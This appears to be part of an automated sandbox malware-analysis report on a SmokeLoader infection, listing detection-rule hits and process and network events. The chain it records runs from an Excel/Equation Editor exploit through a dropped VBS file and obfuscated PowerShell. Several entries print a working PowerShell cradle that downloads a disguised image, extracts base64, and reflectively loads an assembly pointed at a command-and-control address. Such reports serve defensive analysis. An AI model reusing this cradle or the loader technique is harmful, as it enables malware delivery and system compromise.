Rule: Windows_Trojan_Smokeloader_4e31426e
Description: unknown
Author: unknown
Strings:
  • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_SmokeLoader_2
Description: Yara detected SmokeLoader
Author: Joe Security
Source: 13.2.powershell.exe.2565ab4.0.raw.unpack
Rule: JoeSecurity_SmokeLoader_2
Description: Yara detected SmokeLoader
Author: Joe Security

Source: 14.2.RegAsm.exe.400000.0.unpack
Rule: JoeSecurity_SmokeLoader_2
Description: Yara detected SmokeLoader
Author: Joe Security

Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 23.94.148.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3996, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3996, TargetFilename: C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs

System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? 
?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3996, Protocol: tcp, SourceIp: 23.94.148.16, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3416, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 4052, ProcessName: wscript.exe
            Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3416, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 4052, ProcessName: wscript.exe
            Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton | Data: DestinationIp: 208.64.171.230, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3416, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\dagifhd, CommandLine: C:\Users\user\AppData\Roaming\dagifhd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dagifhd, NewProcessName: C:\Users\user\AppData\Roaming\dagifhd, OriginalFileName: C:\Users\user\AppData\Roaming\dagifhd, ParentCommandLine: taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 424, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\dagifhd, ProcessId: 1216, ProcessName: dagifhd
            Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3416, Protocol: tcp, SourceIp: 208.64.171.230, SourceIsIpv6: false, SourcePort: 443
            Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? 